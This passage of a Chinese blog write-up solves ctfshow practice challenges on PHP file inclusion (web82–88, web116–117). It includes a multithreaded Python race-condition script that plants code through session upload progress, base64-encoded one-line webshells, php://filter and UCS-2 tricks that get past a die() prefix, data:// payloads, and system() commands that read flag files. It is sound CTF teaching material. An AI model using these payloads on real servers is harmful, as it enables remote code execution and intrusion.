<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong><code>ctfshow82.py</code> 多线程并发注入 + 读取 + 停止控制脚本（速度极快）</strong></p>
<pre><code class="python">import io
import requests
import threading
import time

# === [1] 靶机地址 ===
url = &#39;http://18f03190-5919-406c-a800-d21ef782a4ec.challenge.ctf.show/&#39;

# === [2] 自定义参数 ===
PHPSESSID = &#39;flag&#39;
PAYLOAD = &#39;&lt;?php system(&quot;cat fl0g.php&quot;);?&gt;mylove&#39;   # 修改命令，自定义标识符
IDENTIFIER = &#39;mylove&#39;  # 用于判断是否成功执行
TARGET_SESS_PATH = &#39;/tmp/sess_flag&#39;  # 修改读取地址

# === [3] 线程控制器 ===
found_flag = threading.Event()

# === [4] 上传线程：持续伪造上传进度 ===
def upload_payload(session, thread_id):
    data = &#123;
        &#39;PHP_SESSION_UPLOAD_PROGRESS&#39;: PAYLOAD
    &#125;

    while not found_flag.is_set():
        try:
            fake_file = io.BytesIO(b&#39;A&#39; * 1024 * 10)  # 10KB 文件
            session.post(
                url,
                cookies=&#123;&#39;PHPSESSID&#39;: PHPSESSID&#125;,
                data=data,
                files=&#123;&#39;file&#39;: (f&#39;upload_&#123;thread_id&#125;.txt&#39;, fake_file)&#125;,
                timeout=3
            )
            print(f&#39;[Upload-&#123;thread_id&#125;] Upload OK&#39;)
        except Exception as e:
            print(f&#39;[Upload-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)

# === [5] 读取线程：不断读取 sess 文件，等待触发执行 ===
def read_session(session, thread_id):
    while not found_flag.is_set():
        try:
            response = session.get(f&#39;&#123;url&#125;?file=&#123;TARGET_SESS_PATH&#125;&#39;, timeout=2)   # 修改靶机读取地址
            if IDENTIFIER in response.text:
                print(f&#39;\n[+] [Read-&#123;thread_id&#125;] Payload executed successfully!\n&#39;)
                print(response.text)
                found_flag.set()
                break
            else:
                print(f&#39;[-] [Read-&#123;thread_id&#125;] Not ready&#39;)
        except Exception as e:
            print(f&#39;[Read-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)
        time.sleep(0.2)

# === [6] 主控函数：并发调度线程 ===
def main():
    session = requests.Session()
    threads = []

    # 启动多个上传线程
    for i in range(3):
        t = threading.Thread(target=upload_payload, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 启动多个读取线程
    for i in range(5):
        t = threading.Thread(target=read_session, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 等待直到有线程设置 found_flag
    while not found_flag.is_set():
        time.sleep(0.2)

    print(&quot;\n[+] Done. Exiting all threads.&quot;)

# === [7] 执行入口 ===
if __name__ == &#39;__main__&#39;:
    main()
</code></pre>
<img data-src="\images\article_images\image-20250807012753787.png" alt="image-20250807012753787" style="zoom:33%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250807012915867.png" alt="image-20250807012915867" style="zoom:33%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web83"><a href="#web83" class="headerlink" title="web83"></a>web83</h1><pre><code class="php">Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:28:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
session_unset();
session_destroy();

if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);

    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p><strong>题解同web82</strong></p>
<img data-src="\images\article_images\image-20250807020107570.png" alt="image-20250807020107570" style="zoom:33%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web84"><a href="#web84" class="headerlink" title="web84"></a>web84</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:40:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);
    system(&quot;rm -rf /tmp/*&quot;);
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><strong><code>rm -rf /tmp/*</code> 强制递归地删除 <code>/tmp</code> 目录下的所有文件和子目录。</strong></p>
<ul>
<li><strong><code>rm</code>：删除文件或目录的命令。</strong></li>
<li><strong><code>-r</code>：递归删除，表示如果是目录，则删除目录内所有内容。</strong></li>
<li><strong><code>-f</code>：强制删除，不会提示确认。</strong></li>
<li><strong><code>/tmp/*</code>：<code>/tmp</code> 目录下的所有文件和文件夹（<code>*</code> 是通配符，匹配所有文件和目录）。</strong></li>
</ul>
<p><strong>其实 <code>session.upload_progress.cleanup = on</code> 本身就会进行清空</strong></p>
<p>&nbsp;</p>
<p><strong>题解同web82</strong></p>
<p><strong>（可通过降低上传线程、增大读取线程、降低<code>time.sleep</code> 更快得到回显）</strong></p>
<img data-src="\images\article_images\image-20250807020302836.png" alt="image-20250807020302836" style="zoom:80%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web85"><a href="#web85" class="headerlink" title="web85"></a>web85</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:59:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);
    if(file_exists($file))&#123;
        $content = file_get_contents($file);
        if(strpos($content, &quot;&lt;&quot;)&gt;0)&#123;
            die(&quot;error&quot;);
        &#125;
        include($file);
    &#125;
    
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><strong>增加</strong></p>
<pre><code class="php">if(file_exists($file))&#123;
    $content = file_get_contents($file);
    if(strpos($content, &quot;&lt;&quot;) &gt; 0)&#123;
        die(&quot;error&quot;);
    &#125;
&#125;
</code></pre>
<ul>
<li><p><strong><code>if(file_exists($file))&#123;</code></strong><br><strong>判断变量 <code>$file</code> 指定的文件是否存在。如果存在，进入代码块。</strong></p>
</li>
<li><p><strong><code>$content = file_get_contents($file);</code></strong><br><strong>读取该文件的全部内容，赋值给 <code>$content</code> 变量。</strong></p>
</li>
<li><p><strong><code>if(strpos($content, &quot;&lt;&quot;) &gt; 0)&#123;</code></strong><br><strong><code>strpos</code> 是查找字符串中某个字符或子串首次出现的位置。</strong><br><strong>这里查找字符串 <code>&quot;&lt;&quot;</code>（小于号）在 <code>$content</code> 中第一次出现的位置。</strong><br><strong>返回值是数字（首次出现的下标），或者 <code>false</code>（没找到）。</strong><br><strong>这里用 <code>&gt; 0</code> 判断：表示只有当 <code>&quot;&lt;&quot;</code> 出现在第1个及之后的位置时（下标大于0）才进入判断。</strong><br><strong>注意，这里如果 <code>&quot;&lt;&quot;</code> 出现在字符串开头（下标0），不会触发条件。</strong></p>
</li>
<li><p><strong><code>die(&quot;error&quot;);</code></strong><br><strong>直接终止程序运行，输出 <code>error</code>。</strong></p>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>依旧可以选择脚本解题</strong></p>
<p>&nbsp;</p>
<p><strong>题解同web82</strong></p>
<img data-src="\images\article_images\image-20250809001445881.png" alt="image-20250809001445881" style="zoom:33%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250809001640338.png" alt="image-20250809001640338" style="zoom: 25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web86"><a href="#web86" class="headerlink" title="web86"></a>web86</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:20:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
define(&#39;还要秀？&#39;, dirname(__FILE__));
set_include_path(还要秀？);
if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);
    include($file);

    
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><code>define(&#39;还要秀？&#39;, dirname(__FILE__));</code></p>
<ul>
<li><code>define</code> 是 PHP 定义常量的函数，第一个参数是常量名（字符串），第二个参数是常量值。</li>
<li>这里定义了一个名为 <code>&#39;还要秀？&#39;</code> 的常量（中文名常量是允许的，只要符合 PHP 标识符规范就行，但中文名一般不推荐）。</li>
<li><code>dirname(__FILE__)</code> 返回当前文件所在目录的绝对路径，比如 <code>/var/www/html</code>。</li>
<li>因此，这条语句是将当前文件所在目录路径赋值为常量 <code>&#39;还要秀？&#39;</code> 。</li>
</ul>
<ol start="2">
<li><code>set_include_path(还要秀？);</code></li>
</ol>
<ul>
<li><code>set_include_path()</code> 是 PHP 用来设置 <strong><code>include 路径</code></strong> 的函数，也就是 <code>include</code>、<code>require</code> 等函数查找文件的目录。</li>
<li>参数是一个字符串，表示新的包含路径。</li>
<li>这里传入了常量 <code>还要秀？</code> （之前定义的当前目录路径）。</li>
<li>也就是说，<code>include_path</code> 被设置成了当前脚本所在的目录。</li>
</ul>
<p>设置 PHP 的包含路径为当前文件的目录路径。这样在后续代码中使用 <code>include()</code>  时，可以省略文件的完整路径，只需提供文件名。</p>
<p>当使用 <code>include()</code>、<code>require()</code>、<code>include_once()</code> 或 <code>require_once()</code> 时，如果提供的路径既不是绝对路径也不是相对路径，PHP 会首先在 <code>include_path</code> 设置的目录中查找文件。</p>
<p>&nbsp;</p>
<p><strong>题解同web82</strong></p>
<img data-src="\images\article_images\image-20250809001850778.png" alt="image-20250809001850778" style="zoom: 25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web87"><a href="#web87" class="headerlink" title="web87"></a>web87</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $content = $_POST[&#39;content&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);
    file_put_contents(urldecode($file), &quot;&lt;?php die(&#39;大佬别秀了&#39;);?&gt;&quot;.$content);

    
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<blockquote>
<p><strong>base64编码只包含64个可打印字符，而php解码base64时遇到不在其中的字符，会忽略掉，将合法字符进行组合变成一个字符串进行解码，所以<code>&lt;?php die(&#39;大佬别秀了&#39;);?&gt;</code> 对其解码后，只有<code>phpdie</code>六个字符组成字符串进行解码</strong></p>
<p><strong>base64算法解码时是4个 <code>byte</code>一组，为了绕过 <code>die</code> ，需要在<code>content</code> base64编码后的前面加上两个字母</strong></p>
</blockquote>
<pre><code class="php">?file=php://filter/write=convert.base64-decode/resource=1.php
</code></pre>
<p><strong>因为题目中有 <code>urldecode($file)</code> ，所以我们需要对其进行两次URL编码</strong></p>
<pre><code class="php">?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
</code></pre>
<p><strong>POST</strong></p>
<p><strong>对一句话木马  <code>&lt;?php @eval($_POST[a]);?&gt;</code> 进行base64编码得到<code>PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==</code>并在前面加上两个字母</strong></p>
<pre><code class="php">content=aaPD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==
</code></pre>
<p>&nbsp;</p>
<p><strong>之后可实现远程代码执行</strong></p>
<p><strong>POST</strong></p>
<pre><code class="php">a=system(&quot;ls&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250809141916723.png" alt="image-20250809141916723" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>POST</strong></p>
<pre><code class="php">a=system(&quot;tac fl0g.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250809141949995.png" alt="image-20250809141949995" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web88"><a href="#web88" class="headerlink" title="web88"></a>web88</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-17 02:27:25
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

 */
if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    if(preg_match(&quot;/php|\~|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\-|\_|\+|\=|\./i&quot;, $file))&#123;
        die(&quot;error&quot;);
    &#125;
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><strong>将 <code>&lt;?php system(“ls”); ?&gt;</code> 经base64编码得 <code>PD9waHAgc3lzdGVtKCJscyIpOyA/Pg==</code></strong></p>
<p><strong>由于过滤符号，所以将  <code>==</code> 去掉</strong></p>
<pre><code class="php">?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOyA/Pg
</code></pre>
<img data-src="\images\article_images\image-20250809154753979.png" alt="image-20250809154753979" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmwwZy5waHAiKTsgPz4
</code></pre>
<img data-src="\images\article_images\image-20250809160357104.png" alt="image-20250809160357104" style="zoom: 25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web116"><a href="#web116" class="headerlink" title="web116"></a>web116</h1><p><strong>题目提示 <code>lfi</code> (php本地文件包含漏洞)</strong></p>
<pre><code class="php">?file=index.php
</code></pre>
<img data-src="\images\article_images\image-20250809161138619.png" alt="image-20250809161138619" style="zoom: 25%;" />

<p>&nbsp;</p>
<p><strong>查看源代码得到</strong></p>
<pre><code class="php">&lt;?php
error_reporting(0);
function filter($x)&#123;
    if(preg_match(&#39;/http|https|data|input|rot13|base64|string|log|sess/i&#39;,$x))&#123;
        die(&#39;too young too simple sometimes naive!&#39;);
    &#125;
&#125;
$file=isset($_GET[&#39;file&#39;])?$_GET[&#39;file&#39;]:&quot;5.mp4&quot;;
filter($file);
header(&#39;Content-Type: video/mp4&#39;);
header(&quot;Content-Length: $file&quot;);
readfile($file);
?&gt;
</code></pre>
<p>&nbsp;</p>
<pre><code class="php">/index.php?file=flag.php
</code></pre>
<p><strong>查看源代码</strong></p>
<img data-src="\images\article_images\image-20250810105105695.png" alt="image-20250810105105695" style="zoom: 25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web117"><a href="#web117" class="headerlink" title="web117"></a>web117</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: yu22x
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 18:16:59

*/
highlight_file(__FILE__);
error_reporting(0);
function filter($x)&#123;
    if(preg_match(&#39;/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i&#39;,$x))&#123;
        die(&#39;too young too simple sometimes naive!&#39;);
    &#125;
&#125;
$file=$_GET[&#39;file&#39;];
$contents=$_POST[&#39;contents&#39;];
filter($file);
file_put_contents($file, &quot;&lt;?php die();?&gt;&quot;.$contents);
</code></pre>
<p>&nbsp;</p>
<ol>
<li><strong><code>iconv()</code> 函数概述</strong></li>
</ol>
<p><code>iconv()</code> 是 PHP 用来进行字符编码转换的函数：</p>
<pre><code class="php">string iconv ( string $in_charset , string $out_charset , string $str )
</code></pre>
<ul>
<li><code>$in_charset</code>：输入字符串的当前编码格式，比如 <code>UTF-8</code>、<code>GBK</code>、<code>ISO-8859-1</code>、<code>UCS-2</code> 等。</li>
<li><code>$out_charset</code>：转换成目标编码格式。</li>
<li><code>$str</code>：需要转换的字符串。</li>
</ul>
<p><strong>功能</strong>：把 <code>$str</code> 从 <code>$in_charset</code> 编码转换成 <code>$out_charset</code> 编码。</p>
<p>&nbsp;</p>
<ol start="2">
<li><strong><code>convert.iconv.</code> 伪协议（Filter）</strong></li>
</ol>
<p>PHP 的 <code>php://filter</code> 允许你对数据流进行过滤。<code>convert.iconv.</code> 过滤器就是用来做字符编码转换的，效果相当于在流读取&#x2F;写入过程中执行 <code>iconv()</code>。</p>
<p>用法举例：</p>
<pre><code class="php">php://filter/convert.iconv.UTF-8/GBK/resource=file.txt
</code></pre>
<p>这表示读取 <code>file.txt</code>，然后把内容从 <code>UTF-8</code> 转成 <code>GBK</code>。</p>
<p>&nbsp;</p>
<ol start="3">
<li><strong>UCS-2 编码</strong></li>
</ol>
<p>UCS-2 是一种固定长度的字符编码，使用两个字节（16 位）来编码一个字符。它是 UTF-16 的前身，但不支持代理对（surrogate pairs），只编码基本多文种平面。</p>
<ul>
<li><strong>特点</strong>：<ul>
<li>每个字符占用 2 字节（2 个字节 &#x3D; 16 位）。</li>
<li>因此处理 UCS-2 编码字符串时，必须保证字符串的字节数是偶数。</li>
</ul>
</li>
</ul>
<p>&nbsp;</p>
<ol start="4">
<li><strong>字节序（Endian）</strong></li>
</ol>
<p>字节序指的是多字节数据在存储或传输时，字节的排列顺序。</p>
<ul>
<li><strong>大端序（Big Endian，BE）</strong>：高位字节存放在低地址（前面），低位字节存放在高地址（后面）。</li>
<li><strong>小端序（Little Endian，LE）</strong>：低位字节存放在低地址（前面），高位字节存放在高地址（后面）。</li>
</ul>
<p>举例，一个 16 位的数字 <code>0x1234</code>：</p>
<ul>
<li>大端序存储为字节序列：<code>12 34</code></li>
<li>小端序存储为字节序列：<code>34 12</code></li>
</ul>
<p>&nbsp;</p>
<ol start="5">
<li><strong><code>&quot;UCS-2BE&quot;</code> 和 <code>&quot;UCS-2LE&quot;</code></strong></li>
</ol>
<ul>
<li>**<code>&quot;UCS-2BE&quot;</code>**：UCS-2 大端序编码<br>字符的两个字节按大端顺序存储，高字节在前，低字节在后。<br>例如字符 <code>&#39;A&#39;</code>（Unicode 0x0041）存储为 <code>00 41</code>。</li>
<li>**<code>&quot;UCS-2LE&quot;</code>**：UCS-2 小端序编码<br>字符的两个字节按小端顺序存储，低字节在前，高字节在后。<br>例如字符 <code>&#39;A&#39;</code> 存储为 <code>41 00</code>。</li>
</ul>
<p>&nbsp;</p>
<pre><code class="php">&lt;?php
$result = iconv(&quot;UCS-2LE&quot;,&quot;UCS-2BE&quot;, &#39;&lt;?php @eval($_GET[a]);?&gt;&#39;);
echo &quot;经过一次反转:&quot;.$result.&quot;\n&quot;;
echo &quot;经过第二次反转:&quot;.iconv(&quot;UCS-2LE&quot;,&quot;UCS-2BE&quot;, $result);
?&gt;

    
/*
经过一次反转:?&lt;hp pe@av(l_$EG[T]a;)&gt;?
经过第二次反转:&lt;?php @eval($_GET[a]);?&gt;
*/
</code></pre>
<p><strong>经过两次反转，代码又回到正常可读状态</strong></p>
<p>&nbsp;</p>
<p><strong>GET <code>file</code> 指向 <code>php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php</code>，让写入时做编码转换。</strong></p>
<p><strong>利用编码顺序变换破坏 <code>&lt;?php die();?&gt;</code>，同时让我们 POST 的 payload 转换后变成正常 PHP。</strong></p>
<p><strong>POST <code>contents</code> 是事先构造好的 UCS-2LE 版本的 <code>&lt;?php eval($_GET[a]);?&gt;</code>。</strong></p>
<pre><code class="php">#GET
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php

#POST
contents=?&lt;hp pe@av(l_$EG[T]a;)&gt;?
</code></pre>
<img data-src="\images\article_images\image-20250810004733731.png" alt="image-20250810004733731" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">/1.php?a=system(&quot;ls&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250810004613048.png" alt="image-20250810004613048" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">/1.php?a=system(&quot;tac flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250810004644416.png" alt="image-20250810004644416" style="zoom:25%;" />

      <div class="tags">
          <a href="/tags/CTF/" rel="tag"><i class="ic i-tag"></i> CTF</a>
          <a href="/tags/Web/" rel="tag"><i class="ic i-tag"></i> Web</a>
          <a href="/tags/%E6%9C%A8%E9%A9%AC%E4%B8%8A%E4%BC%A0/" rel="tag"><i class="ic i-tag"></i> 木马上传</a>
          <a href="/tags/%E6%97%A5%E5%BF%97%E5%8C%85%E5%90%AB/" rel="tag"><i class="ic i-tag"></i> 日志包含</a>
          <a href="/tags/session%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89/" rel="tag"><i class="ic i-tag"></i> session条件竞争</a>
          <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" rel="tag"><i class="ic i-tag"></i> 文件包含漏洞</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2025-09-06 00:42:37" itemprop="dateModified" datetime="2025-09-06T00:42:37+08:00">2025-09-06</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>AlgoZZi <i class="ic i-at"><em>@</em></i>不说永远  珍惜现在
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2025/09/05/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="ctfshow文件包含">http://example.com/2025/09/05/ctfshow文件包含/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2025/09/05/ctfshow%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" itemprop="url" rel="prev" data-background-image="&#x2F;images&#x2F;bg&#x2F;13.jpg" title="ctfshow命令执行">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> ctfshow-web入门wp</span>
  <h3>ctfshow命令执行</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2025/09/05/ctfshow%20php%E7%89%B9%E6%80%A7/" itemprop="url" rel="next" data-background-image="&#x2F;images&#x2F;bg&#x2F;10.jpg" title="ctfshow php特性">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> ctfshow-web入门wp</span>
  <h3>ctfshow php特性</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web78"><span class="toc-number">1.</span> <span class="toc-text">web78</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web79"><span class="toc-number">2.</span> <span class="toc-text">web79</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web80"><span class="toc-number">3.</span> <span class="toc-text">web80</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web81"><span class="toc-number">4.</span> <span class="toc-text">web81</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web82"><span class="toc-number">5.</span> <span class="toc-text">web82</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web83"><span class="toc-number">6.</span> <span class="toc-text">web83</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web84"><span class="toc-number">7.</span> <span class="toc-text">web84</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web85"><span class="toc-number">8.</span> <span class="toc-text">web85</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web86"><span class="toc-number">9.</span> <span class="toc-text">web86</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web87"><span class="toc-number">10.</span> <span class="toc-text">web87</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web88"><span class="toc-number">11.</span> <span class="toc-text">web88</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web116"><span class="toc-number">12.</span> <span class="toc-text">web116</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web117"><span class="toc-number">13.</span> <span class="toc-text">web117</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2025/09/05/ctfshow%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" rel="bookmark" title="ctfshow信息搜集">ctfshow信息搜集</a></li><li><a href="/2025/09/05/ctfshow%E7%88%86%E7%A0%B4/" rel="bookmark" title="ctfshow爆破">ctfshow爆破</a></li><li><a href="/2025/09/05/ctfshow%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="bookmark" title="ctfshow命令执行">ctfshow命令执行</a></li><li class="active"><a href="/2025/09/05/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="bookmark" title="ctfshow文件包含">ctfshow文件包含</a></li><li><a href="/2025/09/05/ctfshow%20php%E7%89%B9%E6%80%A7/" rel="bookmark" title="ctfshow php特性">ctfshow php特性</a></li><li><a href="/2025/09/06/ctfshow%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="bookmark" title="ctfshow文件上传">ctfshow文件上传</a></li><li><a href="/2025/09/06/ctfshow-SQL%E6%B3%A8%E5%85%A5/" rel="bookmark" title="ctfshow SQL注入">ctfshow SQL注入</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="AlgoZZi"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">AlgoZZi</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">8</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">1</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">27</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2025/09/05/ctfshow%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2025/09/05/ctfshow%20php%E7%89%B9%E6%80%A7/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/05/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="ctfshow文件包含">ctfshow文件包含</a></span>
  </li>

      
  <li class="item">
    
